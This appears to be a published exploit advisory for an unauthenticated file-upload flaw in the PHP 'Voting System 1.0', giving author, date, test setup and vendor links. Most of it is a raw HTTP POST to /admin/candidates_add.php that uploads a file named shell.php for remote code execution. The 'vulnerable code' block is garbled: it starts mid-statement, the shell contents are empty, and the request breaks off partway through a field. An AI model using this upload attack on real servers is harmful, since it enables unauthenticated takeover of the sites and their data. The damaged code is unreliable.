# Exploit Title: Voting System 1.0 - Remote Code Execution (Unauthenticated) # Date: 07/05/2021 # Exploit Author: secure77 # Vendor Homepage: https://www.sourcecodester.com/php/12306/voting-system-using-php.html # Software Link: https://www.sourcecodester.com/download-code?nid=12306&title=Voting+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Linux Debian 5.10.28-1kali1 (2021-04-12) x86_64 // PHP Version 7.4.15 & Built-in HTTP server // mysql Ver 15.1 Distrib 10.5.9-MariaDB Unauthenticated file upload is possible via /admin/candidates_add.php that can use for RCE. Your upload will be stored at /images/ and is also accessible without authentication. ########################### Vulnerable code ############################ query($sql)){ $_SESSION['success'] = 'Candidate added successfully'; } else{ $_SESSION['error'] = $conn->error; } } else{ $_SESSION['error'] = 'Fill up add form first'; } header('location: candidates.php'); ?> ########################### Payload ############################ POST /admin/candidates_add.php HTTP/1.1 Host: 192.168.1.1 Content-Length: 275 Cache-Control: max-age=0 Origin: http://192.168.1.1 Upgrade-Insecure-Requests: 1 DNT: 1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrmynB2CmGO6vwFpO User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.1.1/admin/candidates.php Accept-Encoding: gzip, deflate Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close ------WebKitFormBoundaryrmynB2CmGO6vwFpO Content-Disposition: form-data; name="photo"; filename="shell.php" Content-Type: application/octet-stream ------WebKitFormBoundaryrmynB2CmGO6vwFpO Content-Disposition: form-data; name="add"